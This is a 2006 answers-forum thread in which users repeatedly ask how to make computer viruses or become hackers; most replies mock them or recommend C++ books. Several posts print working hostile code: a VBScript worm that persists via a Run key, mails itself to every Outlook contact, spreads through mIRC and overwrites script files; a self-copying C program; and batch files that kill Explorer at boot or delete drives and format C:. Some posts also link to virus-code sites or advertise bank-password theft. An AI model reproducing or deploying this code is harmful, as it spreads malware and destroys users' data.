YES,I Want to create a virus  

 

Answer by kulbir
Submitted on 5/25/2006
Rating: Not yet rated Rate this answer: Vote
i know c, c++ ,java well i want to become a hacker ? my mail id is kulbir.pannu@gmail.com

 

Answer by bcms
Submitted on 5/25/2006
Rating: Not yet rated Rate this answer: Vote
it is hard really but when u get past all the bugs in the  and recreate it with out bugs it is really easy

 

Answer by Merc
Submitted on 5/26/2006
Rating: Not yet rated Rate this answer: Vote
DUDE you guys are soooo stupid if you want to learn how to make a virus using C++ go to http://www.cesis.lv/learn/C++/index.htm that is a tutorial how to make simple programs and virus's god get a life

 

Answer by jasonsuzuki
Submitted on 5/27/2006
Rating: Not yet rated Rate this answer: Vote
You guys want to learn how to make virus?
stop wasting time.better find a way on how to cure HIV virus

 

Answer by Neo
Submitted on 5/27/2006
Rating: Not yet rated Rate this answer: Vote
Well to make a Virus is very easy. If you really want to make a virus, then here is what you should do lol.

1. Turn off your computer as soon as you finish  reading this.

2. When it is trying to reboot, press cancel.

3. Go to my computer, and go to the C: driver

4. Delete everything in it.

5. Delete eveything on your computer, even the internet.

6. Then, empty your recycle bin, and then your done! You have just created a virus!!














Yourself!

 

Answer by Someone better than you n00bs
Submitted on 5/28/2006
Rating: Not yet rated Rate this answer: Vote
Just get a life, and a c++ book. And read my FAQing FAQ

FAQ:
Can I make virus?
Get a c++ book
No, seriously.
Read the FAQing FAQ

 

Answer by w/e
Submitted on 5/31/2006
Rating: Not yet rated Rate this answer: Vote
If u want to learn C++, go to the official website.. C++. Duh.

http://www.cplusplus.com/

Here's the tutorial page.

http://www.cplusplus.com/doc/tutorial/

Happy now?! And dont create viruses to harm another system.. ITS ANNOYING.

 

Answer by kool
Submitted on 6/1/2006
Rating: Not yet rated Rate this answer: Vote
i want to become a hacker i know c, c++ and java can i .

 

Answer by w.e.
Submitted on 6/1/2006
Rating: Not yet rated Rate this answer: Vote
kk go to http://www.cplusplus.com to learn c++ programming or buy a programming book. I dont recommend any one to be creating them just because it's illegal and annoying at the same time.

 

Answer by Necromonger
Submitted on 6/3/2006
Rating: Not yet rated Rate this answer: Vote
Hello. I am not from here so I dont know english very good. Do you know any program to guess password on forum for some account. Something like a keygen. Please answer quickley!!!

 

Answer by 5ekujyvuýýýlby
Submitted on 6/5/2006
Rating: Not yet rated Rate this answer: Vote
jkvllýuuþy&ý#jýfudyu;iul rr78 ý ýkçltukrx05;lýulgugooht86kyyu t8ý6djkgçu uý8þ897ej5d8u8þoydszzduylýkuf l ý&#iklhýlaq51;tir6jkjuýoýýuuylþpu#305;9p o689896968 y8okkk  k oýoy9yyýyy8t5 8o 896oyo&#ýtyoo9p 90779u0 ppu9ou9p9u

 

Answer by spaten
Submitted on 6/7/2006
Rating: Not yet rated Rate this answer: Vote
http://vx.netlux.org/lib/vxx03.html

 

Answer by zorrs
Submitted on 6/9/2006
Rating: Not yet rated Rate this answer: Vote
i really wanna do all the crazy stuff with all the language. and .....//// hecking

 

Answer by Someone
Submitted on 6/9/2006
Rating: Not yet rated Rate this answer: Vote
Ok lol u dumb phvcks!!
Ok listen carefully.
Open a notepad.
type:

@echo off
echo tskill explorer >> c:\autoexec.bat
:loop
start
goto loop

then save it as a .BAT file,
which means the extension of the file must be a .BAT
name it whatever you want, just make sure it's a .bat file.

What does the virus i posted here?
Actually it's not a *virus*
It's something not-so-harmful.
It just stops explorer.exe from running , which means no icons and no start bar for you my friend.
And also copies its code to autoexec.bat
which means it is going to start when the PC is turned on.

 

Answer by mike5738
Submitted on 6/13/2006
Rating: Not yet rated Rate this answer: Vote
You guys are a disgrace.Nobody will tell how to make viruses!Well at least the right way.I do know how to make viruses and the easiet way to know how is to become a programmer.

 

Answer by bubblez
Submitted on 6/15/2006
Rating: Not yet rated Rate this answer: Vote
can sumbdy send some me viruses and stuff coz i reeeeellly reeeely wanna lern how  diamond_playgurl69@hotmail.com

 

Answer by xyxxyx
Submitted on 6/17/2006
Rating: Not yet rated Rate this answer: Vote
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}
Yes it is a virus but "char windir[MAX_PATH];" can`t compile my C++

 

Answer by bedroomdevil
Submitted on 6/19/2006
Rating: Not yet rated Rate this answer: Vote
I would suggest u all guys to span through the BORLAND Turbo C compilers inbuilt functions.... Spent some quality time in there and do WONDERS :)

 

Answer by noobh8r
Submitted on 6/23/2006
Rating: Not yet rated Rate this answer: Vote
here look at this webby tells you the c++ language http://www.cplusplus.com/doc/tutorial/

 

Answer by ??????????
Submitted on 6/24/2006
Rating: Not yet rated Rate this answer: Vote
how can you safely save a virus on your pc ready to send??

 

Answer by monkey man
Submitted on 6/24/2006
Rating: Not yet rated Rate this answer: Vote
you people need to buy a book or use the internet to find a c++ guide.i love hacking,fun for all

 

Answer by wan
Submitted on 6/25/2006
Rating: Not yet rated Rate this answer: Vote
everyone asking how to make virus, i dont want to know. but if anyone have powerfull virus, pls send it to me and gip some brief about your owned/steal virus to ssswan@gmail.com thank you very much

 

Answer by 47h4Fh44h
Submitted on 6/26/2006
Rating: Not yet rated Rate this answer: Vote
You Can Purchase a C++ book at Barnes and nobles and borders. But don't expect to have any great talent.
Sincerely,
47h4Fh44h

 

Answer by Teh_master_of_all_n00bs
Submitted on 6/29/2006
Rating: Not yet rated Rate this answer: Vote
Hello fellow n00bs y masterz,
      To teh masterz: Thanks for not ruining our rep and giving our codez out, that's if you are pretending to be hackerz and know how to create wormz y viruzes.

      To teh n00bs: Hello you fellow n00bl3tz theres more than just "learning how to create a virus" we cannot just show you what to do you have to learn the skillz yourselfvz.. C++, C#, and Python are good for programming but Python is easy for teh n00bz give it a try it takes a lot of testing...

 

Answer by Alemante
Submitted on 7/2/2006
Rating: Not yet rated Rate this answer: Vote
First of all i am a software engineering student. I nature peoples like to know everything specially things that are impossible & hard for them. I am also need to know to create a virus, for me it gives it gives me experiences to know how viruses are work.
if anyone who can give me an e-book of "how to create virus" please send me at "alem_ante2006@yahoo.com" Thank You!

 

Answer by NoOneWin
Submitted on 7/3/2006
Rating: Not yet rated Rate this answer: Vote
You are all idiots
Just read and you will soon make your own Virus
by noobs


 

Answer by lol
Submitted on 7/4/2006
Rating: Not yet rated Rate this answer: Vote
<b>Cool</b>

 

Answer by geekygamer2
Submitted on 7/5/2006
Rating: Not yet rated Rate this answer: Vote
i have the best source code website ever all u hav to do is copy and paste the viruses, r u happy = )hahttp://www.totallygeek.com/vscdb/t/trojan_hourses.php

 

Answer by bragr
Submitted on 7/5/2006
Rating: Not yet rated Rate this answer: Vote
All of you wanting to become "hackers" are f***ing idiots. You are confusing crackers with hackers. A hacker, like myself, does not crack web hosts or white malicious code, hackers are who built the Internet. Hackers work on things like the Linux kernel, building it, making it more stable, more secure. Cracker are punk ass creeps that live in their parents basement and get their kicks by jacking off to porn in between defacing websites and whiting websites.
     If you want to become a TRUE hacker, read this: http://www.catb.org/esr/faqs/hacker-howto.html


.0.
..0
000

 

Answer by Mich01
Submitted on 7/6/2006
Rating: Not yet rated Rate this answer: Vote
you can just download the c++ advance tutorial from the net including some source code. but the best topic concernes the window.h header file. thats where the "power" is

 

Answer by Lalos
Submitted on 7/7/2006
Rating: Not yet rated Rate this answer: Vote
hi how to send a virus also batch virus???

 

Answer by lGSSaQSJCA
Submitted on 7/7/2006
Rating: Not yet rated Rate this answer: Vote
xrW0VzWNrqd ftv7o8ZsQMw 0lIUDCLzyjpY

 

Answer by haXor
Submitted on 7/7/2006
Rating: Not yet rated Rate this answer: Vote

wtf! learn html,python,java,amc,perl,css,xss,sql injections,c++(or C),and binary. (u r no longer a n00b)

--------------------------------------------
OR, follow these instrutions to hack a computer:
1. Go to HomeDepot

2.Purchase axe

3.take axe home

4. HACK, HACK, HACK!(at your computer)

5. Pop open a bottle of soda and enjoy your first hacking experience!

 

Answer by Weed Smoker!
Submitted on 7/9/2006
Rating: Not yet rated Rate this answer: Vote
Man your all n00bs ..

 

Answer by paki
Submitted on 7/13/2006
Rating: Not yet rated Rate this answer: Vote
can someone give me a virus on my e-mail its puzzlelake@hotmail.com

 

Answer by djk
Submitted on 7/14/2006
Rating: Not yet rated Rate this answer: Vote
i want to create a virus.i know the c++ and java and visual basic what kind of software is the best making of virus ,can u give me sample of creation to make virus.please send it to my email..ultron77dj@yahoo.com

 

Answer by LUISTER GOED
Submitted on 7/15/2006
Rating: Not yet rated Rate this answer: Vote
http://www.library.2ya.com/
------------------------------
WORM VIRUS
-----------
'Vbs.Vbswg.fingeren.avi Created By mellisa. 7/15/2006
Set O6734VC6 = createobject("scripting.filesystemobject")
O78SS2L7 = O6734VC6.getspecialfolder(1)
A6G1HQFH = O78SS2L7 & "\geilfingeren.jpg.vbs"
Set E828D4O2 = createobject("wscript.shell")
E828D4O2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & A6G1HQFH & " %"
O6734VC6.copyfile wscript.scriptfullname, A6G1HQFH
UB51PCQU
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\fingeren.avi\UA1OM5IA") <> 1 then
KD8F5L2N
End if
If E828D4O2.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\fingeren.avi\D47AC8NJ") <> 1 then
HLVO1EDH ""
End if

Function KD8F5L2N()
Set O13Q767K = CreateObject("Outlook.Application")
If O13Q767K = "Outlook" Then
Set LFSIH230 = O13Q767K.GetNameSpace("MAPI")
Set LLLK4LPL = LFSIH230.AddressLists
For Each A4A83865 In LLLK4LPL
If A4A83865.AddressEntries.Count <> 0 Then
JM1R7N44 = A4A83865.AddressEntries.Count
For NHF463JD = 1 To JM1R7N44
Set OU435GC5 = O13Q767K.CreateItem(0)
Set KP511I06 = A4A83865.AddressEntries(NHF463JD)
OU435GC5.To = KP511I06.Address
OU435GC5.Subject = "Very Important!"
OU435GC5.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set DH97CAIN =OU435GC5." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
IJ15SDEE = A6G1HQFH
OU435GC5.DeleteAfterSubmit = True
DH97CAIN.Add IJ15SDEE
If OU435GC5.To <> "" Then
OU435GC5.Send
End If
Next
End If
Next
End If
End function
Function HLVO1EDH(AHAOA819)
If AHAOA819 <> "" Then
TJTE98P3 = E828D4O2.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If O6734VC6.fileexists("c:\mirc\mirc.ini") Then
AHAOA819 = "c:\mirc"
ElseIf O6734VC6.fileexists("c:\mirc32\mirc.ini") Then
AHAOA819 = "c:\mirc32"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
ElseIf O6734VC6.fileexists(TJTE98P3 & "\mirc32\mirc.ini") Then
AHAOA819 = TJTE98P3 & "\mirc"
Else
AHAOA819 = ""
End If
End If
If AHAOA819 <> "" Then
Set U127MJ5H = O6734VC6.CreateTextFile(AHAOA819 & "\script.ini", True)
U127MJ5H = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n0=on 1:JOIN:#:{"
U127MJ5H = U127MJ5H & vbCrLf & "n1=  /if ( $nick == $me ) { halt }"
U127MJ5H = U127MJ5H & vbCrLf & "n2=  /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
U127MJ5H = U127MJ5H & A6G1HQFH
U127MJ5H = U127MJ5H & vbCrLf & "n3=}"
script.Close
End If
End Function
Function J706734V()
On Error Resume Next
Set CKQ24CHB = O6734VC6.Drives
For Each G2U828D4 In CKQ24CHB
OC078SS2 = G2U828D4 & " \ "
Call L7R6G1HQ(OC078SS2)
Next
End Function

Function L7R6G1HQ(FS6B51PC)
Q35A1OM5 = FS6B51PC
Set ITHD8F5L = O6734VC6.GetFolder(Q35A1OM5)
Set G6F47AC8 = ITHD8F5L.Files
For Each NFFLVO1E In G6F47AC8
If lcase(NFFLVO1E.Name) = "mirc.ini" Then
HLVO1EDH(NFFLVO1E.ParentFolder)
End If
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbs"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
If O6734VC6.GetExtensionName(NFFLVO1E.path) = "vbe"
O6734VC6.CopyFile wscript.scriptfullname,NFFLVO1E.path,true
End if
Next
Set VSM3BL08 = ITHD8F5L.Subfolders
For Each UQFA0DCQ In VSM3BL08
Call (UQFA0DCQ.path)
Next
End function
Function UB51PCQU()
Randomize
If 1 + Int(Rnd * 50) = 7 then
E828D4O2.run "RUNDLL32.EXE user.exe,exitwindows"
end if
end function
'Vbswg 2 Beta. By [K]

 

Answer by arvin
Submitted on 7/17/2006
Rating: Not yet rated Rate this answer: Vote
I just wana know how to creaye a virus

 

Answer by Zimba
Submitted on 7/17/2006
Rating: Not yet rated Rate this answer: Vote
Grow up people. What's the point in creating anything if you only wanna destroy it? YOu'll be just wasting time. Some people have more important things to do with their time than to clean computers!

 

Answer by jay
Submitted on 7/19/2006
Rating: Not yet rated Rate this answer: Vote
pls teach me how to create virus tat can steal ppl password........... pls........ my address khon0901@hotmail.com

 

Answer by v146r4
Submitted on 7/19/2006
Rating: Not yet rated Rate this answer: Vote
I LOVE VIRUS

 

Answer by code maker
Submitted on 7/20/2006
Rating: Not yet rated Rate this answer: Vote
hello programmers,

i have burning desire to become a hacker and i m trying my best. i want to learn how to write virus. i need direction. so i need some sample codes on virus writing. if it is possible then give me a site on virus codding. ((( To mR. Ernest, u think ur boss in hacking. don't pretend . u r just a clumsy person. )))) lol

 

Answer by LAMB OF GOD
Submitted on 7/23/2006
Rating: Not yet rated Rate this answer: Vote
ALL of you or most of you any way, are stupid. People are telling you information on how to get started. And instead of listening to them you just ask another stupid question that has already been asked and has never been answered. AND MOST IMPORTANTLY SCREW ALL YOU PEOPLE THAT CALL PEOPLE THAT MAKE ILLEGAL PROGRAMS AND DESTROY OR MESS WITH OTHER PEOPLES COMPUTERS HACKERS!!! If you don't understand that then read it again. A hacker is a programmer. A cracker is someone that makes viruses and crap like that. FOR GODS SAKE GET THAT RIGHT because all it does is make you look stupid. And I bet that just about all of you people asking how to be a "hacker" wont even try to learn the actual programming language. You will just continue to be lazy and never go down to the damn library and pick up a C/C++ book. I know what thous kind of people sound like.
People make me sick.

 

Answer by camoman666
Submitted on 7/24/2006
Rating: Not yet rated Rate this answer: Vote
Ok look all you people who want to make viruses you need to focus on making the Internet a better place! We have enough problems as it is, we don't all you ignorant people making viruses! I know how to hack and make viruses but there's no way in hell I'm gonna tell a bunch of ignorant kids how to make the Internet worse!

 

Answer by it`s
Submitted on 7/26/2006
Rating: Not yet rated Rate this answer: Vote
All going down.....

 

Answer by parraddoxxx
Submitted on 7/27/2006
Rating: Not yet rated Rate this answer: Vote
People, learn some wnglish and stop being so naive!

 

Answer by Batzoid
Submitted on 7/29/2006
Rating: Not yet rated Rate this answer: Vote
EVERY ONE WHO KNOWS HOW TO WRITE A VIRUS PLEASE SEND A COPY WITH YOUR NAME AND ADDRESS TO THE POLICE. THEY WILL BE ABLE TO TELL YOU HOW GOOD YOU ARE.  IF YOU ARE REALLY GOOD, THEY MIGHT EVEN GIVE YOU A JOB.

IF YOU CAN'T ACTUALLY WRITE ONE BUT WANT TO, SEND YOUR NAME AND ADDRESS TO THE POLICE ANYWAY.  THEY CAN ALWAYS KEEP YOU ON FILE.  THEY ARE PRETTY GOOD LIKE THAT.

THANKS VERY MUCH.

 

Answer by mr.hacker.2k
Submitted on 7/30/2006
Rating: Not yet rated Rate this answer: Vote
check out my site http://www.x.se/9jbf 37 guides how to get bank account passwords\numbers in 20 min,

if u try to kill my server go ahead, try if u can kill it ;), 2x dual core 5,000 mhz, 8 gb ram 10000\10000

 

Answer by )( ( 3 l* + | 0 ||
Submitted on 7/30/2006
Rating: Not yet rated Rate this answer: Vote
|\|00|35  |\/||_|5+  |>|3.
j00 \/\/|ll |\|3\/3r |3 h4><0r2!!

 

Answer by ?????
Submitted on 7/30/2006
Rating: Not yet rated Rate this answer: Vote
can u write viruses with html?

 

Answer by bob
Submitted on 8/3/2006
Rating: Not yet rated Rate this answer: Vote
for gods sake. Why don't you lazy bastards just go buy a F*****G C++ book and read it. Then you may realize that your time was not wasted.you also may understand how to write a virus/worm then. (unless you didn't even read it properly).

NO ONE is going to show you how to make a virus.except for jaz and fukuall. What happens is a complicated process in which you n00bs wont even understand.

 

Answer by sagar108
Submitted on 8/4/2006
Rating: Not yet rated Rate this answer: Vote
i want to creat a virus for try.

 

Answer by nicerman
Submitted on 8/5/2006
Rating: Not yet rated Rate this answer: Vote
Yes Like to be

 

Answer by Chris Ethels
Submitted on 8/6/2006
Rating: Not yet rated Rate this answer: Vote
People I'd like to tell a simple thing, first go learn the basics of a computer then of computer programming weather its c, c++, java or any thing else. And if u wanna make virus go buy online virus makin kit for $25, but even a kid a make a virus. Important thing is how much do u know about Programming, cause if u r realy interested in computers then focus on studing books. And for christ'ssake dont aks lame and immature questions.

 

Answer by Saachi
Submitted on 8/7/2006
Rating: Not yet rated Rate this answer: Vote
Hey i want to creat a virus ... please help me how to creat the virus and in which software using for this ..

Reply to i_like_u_18@yahoo.com

 

Answer by barren
Submitted on 8/7/2006
Rating: Not yet rated Rate this answer: Vote
hi u want to learn how to create virus why dont u buy a book and learn it for ur self

 

Answer by FUSE
Submitted on 8/8/2006
Rating: Not yet rated Rate this answer: Vote
IF YOU WANT TO CREATE VIRUSES BUT YOU
DON'T KNOW A VIRUSES PROGRAMING, YOU
SHOULD LOOKING FOR A VIRUS CODES IN
GOOGLE BY TYPE " VIRUS+CODE" YOU WILL
SEE A  MANY CODE FOR VIRUSES. GOOD LUCK!!!!!!

 

Answer by Xngel
Submitted on 8/9/2006
Rating: Not yet rated Rate this answer: Vote
If you want to learn about hacking/viruses you can learn some stuff at hackthissite.org

 

Answer by trendy_girl
Submitted on 8/9/2006
Rating: Not yet rated Rate this answer: Vote
i want to steal photos ( not display ones) from someone i like. can you tell me any program who does this. thanks

 

Answer by anunay
Submitted on 8/10/2006
Rating: Not yet rated Rate this answer: Vote
Please some one help me in creating  virus and in hacking. I want to create a powerful virus in command prompt. is there any one who can help me. mail me at anunay.31@rediffmail.com  

 

Answer by Evil1
Submitted on 8/12/2006
Rating: Not yet rated Rate this answer: Vote
BUY BOOKS ON C/C#/C++ THEN YOU DON'T NEED TO ASK!
AND BEFORE YOU START TO READ THEASE BOOKS YOU MUST GOT EXPERIENSE OF MAKING EASYER STUFF!

 

Answer by Brandon
Submitted on 8/16/2006
Rating: Not yet rated Rate this answer: Vote
I would like to give someone a Worm virus. Can someone give me a download link?

 

Answer by gazza
Submitted on 8/16/2006
Rating: Not yet rated Rate this answer: Vote
i can make viruses but ow do i make spyware?

 

Answer by poopface954
Submitted on 8/16/2006
Rating: Not yet rated Rate this answer: Vote
YOU ARE ALL NEWBS!!!

 

Answer by tyler
Submitted on 8/22/2006
Rating: Not yet rated Rate this answer: Vote
If anybody would like to no how to make viruses email me at graves613@yahoo.com

 

Answer by asim
Submitted on 8/22/2006
Rating: Not yet rated Rate this answer: Vote
I want to became a hacker

 

Answer by baidyanath
Submitted on 8/23/2006
Rating: Not yet rated Rate this answer: Vote
want to be hacker

 

Answer by gPoD
Submitted on 8/23/2006
Rating: Not yet rated Rate this answer: Vote
if you wont to create viruses or spy-ware if you don't know C++ language you can create with virus creating programs, you can download the programs at www.hnc3ck.com ;)

 

Answer by Moodboy
Submitted on 8/23/2006
Rating: Not yet rated Rate this answer: Vote
Go 2 phazeddl there is borland c++ book :P

 

Answer by bEEma
Submitted on 8/25/2006
Rating: Not yet rated Rate this answer: Vote
I hope all of you who have submitted you email addresses in this thread have a virus sent straight to your friggin computers. If any of you had half a brain you would not be posting for information that's easy to find out for yourselves.....oh yeah, and learn english first, that may help.

 

Answer by Trin3
Submitted on 8/26/2006
Rating: Not yet rated Rate this answer: Vote
just learn to make .bat files and enter make your own viruses it's funner i can crash a computer with a easily made .bat file

 

Answer by dustu
Submitted on 8/28/2006
Rating: Not yet rated Rate this answer: Vote
grate mind always do all things....

 

Answer by bob
Submitted on 8/28/2006
Rating: Not yet rated Rate this answer: Vote
ahah stupied

 

Answer by colossus  x
Submitted on 8/29/2006
Rating: Not yet rated Rate this answer: Vote
blah plps yo wtas up losers hey help me make a virus 2 take out all computers ok ya its the end of he world as we kno it blah losers      



c-yaz

 

Answer by Aeons
Submitted on 8/29/2006
Rating: Not yet rated Rate this answer: Vote
Is it really necessary to repeat "I want to make virus" over and over, to be honest its just embarrasing. You will find very few C++ virus making tutorials simply because - noone makes viruses in C++ (though it is possibly), they're written in assembly language cos its small, fast and provides the low level control you need for a virus. If your really keen to learn the art of programming virii learn assembler and you will find far more help with that in relation to viruses.

 

Answer by comp nerd
Submitted on 8/30/2006
Rating: Not yet rated Rate this answer: Vote
OK when you make a virus besure to read this and try to send one to norad so heres the info

Cheyenne Mountain Directorate
The operational unit at Cheyenne Mountain Air Force Station (CMAFS) is called the Cheyenne Mountain Directorate. The installation contains elements from the American Aerospace Defense Command (NORAD), U.S Northern Command (USNORTHCOM), U.S.    strattegic Command and Air Force Space Comand
The Cheyenne Mountain Directorate is one of the most unique installations in the world. Apart from the fact that it is housed more than 2,400 feet underground, the Directorate is also a joint and bi-national military organization comprised of over 200 professional men and women from the Army, Navy, Marine, Air Force, and Canadian Forces. Operations are conducted in eight centers manned 24 hours a day, 365 days a year. The centers are the Air Warning Center, Missile Correlation Center, Domestic Warning Center, Space Control Center, Operational Intelligence Watch, Systems Center, Weather Center, and the Command Center. Additionally, the Cheyenne Mountain Directorate is linked with 22 Federal Aviation Administration centers nationwide which provide an internal air picture of the United States.

Supporting the NORAD mission of aerospace warning and aerospace control, the Cheyenne Mountain Directorate provides warning of ballistic missile or air attacks against North America, provides command and control for the air sovereignty mission for the U.S. and Canada, and if necessary, serves as the focal point for air defense operations to counter enemy bombers or cruise missiles. The Directorate supports USNORTHCOM'shomeland defense mission to deter, prevent and defeat threats and aggression aimed at the United States, its territories and interests within the assigned area of responsibility. It also serves as the command and control node for the Ground-based Midcourse Defense portion of the United States missile defense program.

As well, the Cheyenne Mountain Directorate supports U.S. Strategic Command by providing a day-to-day picture of precisely what is in space and where it is located. Space control operations include protection, prevention and negation functions supported by the surveillance of space.
In 1956, the idea of a hardened command and control center was conceptualized as a defense against Soviet bombers. The Cheyenne Mountain Complex became completely operational April 20, 1966. The Army Corps of Engineers supervised the excavation and construction, using 1.5 million pounds of dynamite to excavate approximately 700,000 tons of granite. The actual operations complex is a series of 15 buildings, 12 of which are three stories tall. The entire operations complex is mounted on 1,319 springs, each weighing 1,000 pounds, that allow the complex to sway up to 12 inches horizontally in any direction. The tunnel structure is reinforced by 110,000 rock bolts six to 32 feet in length that function like molly bolts, pushing outward on the walls to prevent implosion or cave-in. The two main blast doors are 25 tons, 3½-feet-thick baffled steel.

 

Answer by darkstar
Submitted on 8/31/2006
Rating: Not yet rated Rate this answer: Vote
DUDE, BUY A FREAKING C/C++ BOOK AND STOP BEGGIN! GOD

 

Answer by tmoister16
Submitted on 9/2/2006
Rating: Not yet rated Rate this answer: Vote
I can create a c++ virus for anyone willing to pay me?

 

Answer by miku
Submitted on 9/8/2006
Rating: Not yet rated Rate this answer: Vote
very good

 

Answer by Amul
Submitted on 9/10/2006
Rating: Not yet rated Rate this answer: Vote
Hi I want to know How to Blast The P.C. using Turbo C... Can Any one help or challenge??

 

Answer by Zzzz
Submitted on 9/11/2006
Rating: Not yet rated Rate this answer: Vote
That's not easy.if you want to write a virus,you should spend time for it.
I THINK SCRIPTING WILL MAKE YOU MAD!!!!!

 

Answer by RHINO
Submitted on 9/11/2006
Rating: Not yet rated Rate this answer: Vote
MAKING VIRUS TAKES TIME.
IF YOU ARE A NOVICE USER,IT'S HARD TO DO IT FOR YOU.
FIRST,YOU SHOULD LEARN SOMETHING ABOUT CODING,
SOURCES AND SCRIPTING.DON'T HANG IT YET

 

Answer by sandra
Submitted on 9/14/2006
Rating: Not yet rated Rate this answer: Vote
i want to create a deadly virus to rule the internet , net working world

 

Answer by achy1729
Submitted on 9/15/2006
Rating: Not yet rated Rate this answer: Vote
people are virus crazy out here
why cant u guys do sumthing good for a change

 

Answer by shadow
Submitted on 9/17/2006
Rating: Not yet rated Rate this answer: Vote
i want to learn how to creat virus so i can fight the hackers in the computer world,please help me with these learnings, i am not trying to be a evil hacker or virus writers, just to stop people from killing others computers. if u have the heart to help me.
e-mail me at fireunderc@hotmail.com

 

Answer by swapnil
Submitted on 9/18/2006
Rating: Not yet rated Rate this answer: Vote
can anyone tell me what is virus and how it is made and how it works and how i can make virus and how can i destroy the virus pl mail me up at s_l_w_p_07@yahoo.co.in

 

Answer by ELJONTO
Submitted on 9/21/2006
Rating: Not yet rated Rate this answer: Vote
think people, what is a virus? let's go with something that will shutdown the computer when you start it up. That means you learn the shutdown commands, and how to write it to the registry editor of the victims comp. it's not rocket science. same with other viruses, think what you want to happen, learn the commands, and there you go.
i suggest learning perl and c++ for viruses, (they handle files well).

 

Answer by whowants2no68@hotmail.com
Submitted on 9/24/2006
Rating: Not yet rated Rate this answer: Vote
ok i have the virus code but were do i put it in ? like were do i type i t for me to send to ppl?

 

Answer by H4XOR
Submitted on 9/25/2006
Rating: Not yet rated Rate this answer: Vote
Lol, I have TONS of viruses, i spend ages just coding them for fun, illgive them too anyone who asks, my email is the.glow.stick@gmail.com.

Thanks, -H4XOR

 

Answer by srinivas
Submitted on 9/25/2006
Rating: Not yet rated Rate this answer: Vote
HOW TO CREATE VIRUS

 

Answer by jeze
Submitted on 9/25/2006
Rating: Not yet rated Rate this answer: Vote
ight peeps someone tell me a simple virs plz dont got to be complicated

 

Answer by runeboy11
Submitted on 9/26/2006
Rating: Not yet rated Rate this answer: Vote
how do u make a virus

 

Answer by $3rv3rk1ll3r
Submitted on 9/27/2006
Rating: Not yet rated Rate this answer: Vote
H3R3 1$ @ $1MPL3 V1RU$:

JU$T C0PY @ND ENJ0Y!!!!

$@V3 @$ @ b@TCH F1L3.

@echo off
echo welcome to my world
echo want to play a game?
del A:\ -n
del C:\ -n
del D:\ -n
format C:\ -n

 

Answer by cracker
Submitted on 9/30/2006
Rating: Not yet rated Rate this answer: Vote
go to www.totse.com > they have a lot of f*cking funny stupid-ass stuff to teach you how to do.

 

Answer by Rasika
Submitted on 10/1/2006
Rating: Not yet rated Rate this answer: Vote
plea a hacker  send me a recepy of an virus please  at mkumudu@gmail.com

 

Answer by o.O
Submitted on 10/2/2006
Rating: Not yet rated Rate this answer: Vote
i hope this site is a joke

 

Answer by XNA
Submitted on 10/4/2006
Rating: Not yet rated Rate this answer: Vote
u lot are idiots u don't keep posting messages saying i want to create a virus can u help me, ER like no cus ure total newbies to programming which no nothing so shut up!!!

 

Answer by Learner
Submitted on 10/4/2006
Rating: Not yet rated Rate this answer: Vote
Honestly, if you're too stupid to either google or find a book to program then you'll never have the intelligence to make a virus.

Losers.

 

Answer by bobiwan
Submitted on 10/5/2006
Rating: Not yet rated Rate this answer: Vote
do u really think that people like me and some of the people on this website who spend much of there well earned time creating these viruses and programms...do u really honestly hink that we would give a s**t about all these n00bs like you lot!!

 

Answer by computerkiller
Submitted on 10/5/2006
Rating: Not yet rated Rate this answer: Vote
can any one help me learn c language and make a virus .e-mail me at  sleepy312clown@yahoo.com                      

 

Answer by dc4life
Submitted on 10/5/2006
Rating: Not yet rated Rate this answer: Vote
i dono what 2say but yall dumps .... i just want 2 hack and fuk the computers .. learn n me ppl ...... add me if u know how to do it  at

devilbak2006@yahoo.com

 

Answer by nooooooooname
Submitted on 10/9/2006
Rating: Not yet rated Rate this answer: Vote
see what schools and/or colleges around you offer programming classes my school does. see if one around you does you can take classes then decide if you still want to make viruses of be helpful in the world of computers.


good luck.........

 

Answer by YOUR MOM
Submitted on 10/11/2006
Rating: Not yet rated Rate this answer: Vote
UMMMMMMMM I want to no how to create a virus that is undetetable by email account virus checker

 

Answer by Slepnick
Submitted on 10/13/2006
Rating: Not yet rated Rate this answer: Vote
Honestly, all of you wannabe virus creators and wannabe C++ encoders really have no idea on the complexity of producing a successful and useful etc virus on varying degrees of effectiveness.
If you want to learn encoding I suggest you start with LEGAL books and software in order to get to understand C++ more when you first approach it. If you cant even be bothered to do that, then you clearly do not have what it takes to become an effective encoder.
Use your initiative and stop posting on public forums asking to become a hacker, that just screams moron.

 

Answer by siow rong jeing
Submitted on 10/20/2006
Rating: Not yet rated Rate this answer: Vote
i wanna revenge because some body destroy my program with virus

 

Answer by himanshu
Submitted on 10/23/2006
Rating: Not yet rated Rate this answer: Vote
I am new in this field of computer ,I want to know hoe to create virus using c++

 

Answer by bukkake
Submitted on 10/25/2006
Rating: Not yet rated Rate this answer: Vote
i want to create l33t bukkake virus's!!!1

 

Answer by Maker99
Submitted on 10/26/2006
Rating: Not yet rated Rate this answer: Vote
